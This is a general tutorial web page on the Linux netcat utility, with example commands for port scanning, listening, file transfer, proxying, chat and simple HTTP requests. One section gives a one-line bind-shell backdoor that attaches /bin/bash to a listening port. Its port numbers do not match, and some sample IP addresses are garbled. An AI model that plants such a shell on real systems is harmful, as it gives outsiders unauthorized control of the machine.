This comprehensive Linux guide expects that you run the following commands as root user but if you decide to run the commands as a different user then ensure that the user has
sudoaccess and that you precede each of the privileged commands with
netcat is a feature-packed networking utility which reads and writes data across networks from the command line.
netcat was written for the
Nmap Project and is the culmination of the currently splintered family of Netcat incarnations.
It works similarly to the
cat command but it is for the network. It reads or writes data from/to the network using the TCP and UDP protocols. It is one of the most powerful networking tools available to the linux users as it is called the Swiss Army Knife of networking tools. It is most oftenly used by networking specialists to monitor, test and send data across a network.
In this tutorial, we will show you the use of the
netcat command with multiple examples.
Installing netcat Command
netcat command on your linux machine, you can run the following command
On Debian Based Systems
[email protected]:~$ apt install netcat
On Red-Hat Based Systems Or CentOS
[email protected]:~$ yum install nmap-ncat
Following is the general syntax of the
[email protected]:~$ netcat [options] host port OR [email protected]:~$ ncat [options] host port OR [email protected]:~$ nc [options] host port
Using netcat For Port Scanning
netcat is most commenly used for port scanning. You can scan a single port as well as multiple ports or a range of ports. You can use the option
-z for only scanning the open ports without sending any data and option
-v to get a more detailed output.
[email protected]:~$ nc -z -v 126.96.36.199 80 Warning: forward host lookup failed for 188.8.131.52.vultr.com: No address associated with name 184.108.40.206.vultr.com [220.127.116.11] 80 (http) open
If you want to display only the open ports, you can filter the output through the grep command like this
[email protected]:~$ nc -z -v 18.104.22.168 80-300 | grep succeeded
Listening To Inbound Connections
You can also use this command to listen to inbound connections to your systems by using the option
-l with a specific port to listen from.
[email protected]:~$ nc -l port [email protected]:~$ nc -l 8080
Connecting To A System Remotely
You can connect to another system remotely using this command. You can run the command like below
[email protected]:~$ nc IP_Address Port [email protected]:~$ nc 192.168.1.1 80
Checking Server Software And It’s Version
You can also use
netcat command to find the server software and it’s version by sending the “EXIT” command to the server on the default SSH port 22 like below:
[email protected]:~$ echo "EXIT" | nc 22.214.171.124 22 SSH-2.0-OpenSSH_7.4p1 Debian-10+deb9u6 Protocol mismatch.
Chatting With A Remote System
You can also use
netcat command to make a chat system between one host and another. First, you need to set up a host to listen through a specific port. Then you need to connect to that host using that port on your system.
From Server side
[email protected]:~$ nc -l 4444
From Client Side
[email protected]:~$ nc server-IP 4444
Replace the “host-IP” with the IP of the host that is listening for an inbound connection.
Once the connection is established, you can start sending messages to the server. Those messages will be displayed on the terminal of the server.
You can also use
netcat command to send or receive files from one host to another.
For this, you first need to start the listener on the system on which the file is to be received.
[email protected]:~$ nc -l 4444 > file.txt
Now, you can send the file from the other host using this port by running the command like this
[email protected]:~$ nc host-IP 4444 < file.txt
Replace the “host-IP” with the IP of the host that is listening for the file to be received.
If you want to send a directory using
netcat command, you first need to make an archive of that directory using tar command and then send it over using the
[email protected]:~$ tar czvf - /path/to/directory | nc host-IP 4444
Then you can receive the file and extract it using the command like this
[email protected]:~$ nc -l 4444 | tar xzvf -
Using netcat As Proxy
You can also use
netcat command as a proxy for your system.
[email protected]:~$ nc -l 4444 | nc 192.168.100.1 40
Now all the connections coming to our server on port 4444 will be automatically redirected to 192.168.100.1 server on port 40. But since we are using a pipe, data can only be transferred & to be able to receive the data back, we need to create a two way pipe. Use the following commands to do so:
[email protected]:~$ mkfifo 2way [email protected]:~$ nc -l 4444 0<2way | nc 192.168.100.1 40 1>2way
After this command, you will be able to send a receive data over proxy.
Using UDP Ports
If you want to scan UDP ports, you can just add the option
-u with the command
[email protected]:~$ nc -u -z -v 192.168.100.1 80-200 192.168.100.1: inverse host lookup failed: Unknown host (UNKNOWN) [192.168.100.1] 200 (?) open (UNKNOWN) [192.168.100.1] 199 (smux) open (UNKNOWN) [192.168.100.1] 198 (?) open (UNKNOWN) [192.168.100.1] 197 (?) open (UNKNOWN) [192.168.100.1] 196 (?) open (UNKNOWN) [192.168.100.1] 195 (?) open (UNKNOWN) [192.168.100.1] 194 (irc) open
Similarly, you can add this option to any
netcat command to implement it on the UDP ports.
Creating A Backdoor Using netcat Command
You can also use
netcat command to create a backdoor. This functionality is mostly used by hackers. You can run the command like this:
[email protected]:~$ nc -l 5566 -e /bin/bash
-e flag attaches a bash to port 10000. Now a client can connect to port 10000 on server & will have complete access to our system via bash by running the command like this:
[email protected]:~$ nc 192.168.100.1 5566
Running A Web Server With A Static Page Using netcat
You can also start a web server using the
netcat command on a local host that will open a static web page “sample.html”. To perform this, you can run the command like this
First, make a new file with the name “sample.html” and copy the following code into the file.
<html> <head> <title>Test Page</title> </head> <body> <h1>Level 1 header</h1> <h2>Subheading</h2> <p>Normal text here</p> </body> </html>
Then run the following command:
[email protected]:~$ while true; do sudo nc -lp 80 < sample.html; done
After this, you can access the page on by going to “http://server-IP.com/sample.html”
Setting The Connection Timeout
If we run the command in the listener mode, it will continue infinitely and will have to be terminated manually. But we can set up a timeout for a connection by using the option
-w with the
[email protected]:~$ nc -w 10 192.168.100.1 4444
Making The Server Persistent
The server will terminate automatically when the client disconnects from it. To make the server to listen to more connections even when a client disconnects, you can use the option
-k with the
[email protected]:~$ nc -l -k 4444
Performing HTTP Request
You can also use this command to send various HTTP requests to a remote server.
For example, if you want to retrieve the netcat main page from the OpenBSD web site, run this command:
[email protected]:~$ printf "GET /nc.1 HTTP/1.1\r\nHost: man.openbsd.org\r\n\r\n" | nc man.openbsd.org 80